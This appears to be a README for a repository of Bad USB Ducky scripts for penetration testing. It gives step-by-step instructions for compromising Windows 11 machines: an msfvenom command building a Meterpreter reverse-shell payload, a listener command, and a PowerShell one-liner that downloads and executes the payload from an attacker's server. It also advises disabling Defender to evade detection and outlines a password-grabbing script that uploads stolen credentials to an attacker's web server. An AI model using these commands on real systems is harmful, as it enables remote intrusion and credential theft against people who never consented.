JoeSaf/Bad-USB-Scripts

Bad USB scripts created for Penetration Testers

Various Ducky scripts for Bad USBs

Can be used for pentesting or administrative tasks.

For educational puposes only!

Tested and working on WIndows 11

Steps to Compromise(StealthReverseShell.txt):

Requires Admin privileges to disable Defender. Otherwise, the payload may be detected.

1. Create the payload with msfvenom
   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttacksersIP LPORT=AttackersPort -f psh -o PAYLOAD.ps1
   
2. Open msfconsole and start listener
   msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost IP; set lport PORT; set ExitOnSession false; exploit -j"
   
3. Start python http server
   python3 -m http.server 80
   
4. Ducky script will download and execute payload session
   IEX(New-Object System.Net.WebClient).DownloadString('http://IPADDR/PAYLOAD.ps1')

Demonstration Video

Steps to Compromise(PassGrab.txt):

Requires Admin privileges to disable Defender. Otherwise, the payload may be detected.

1. Setup the web server.
   
2. Replace the domain name with your own.
   
3. Setup php file to accept incoming upload requests.
   

Demonstration Video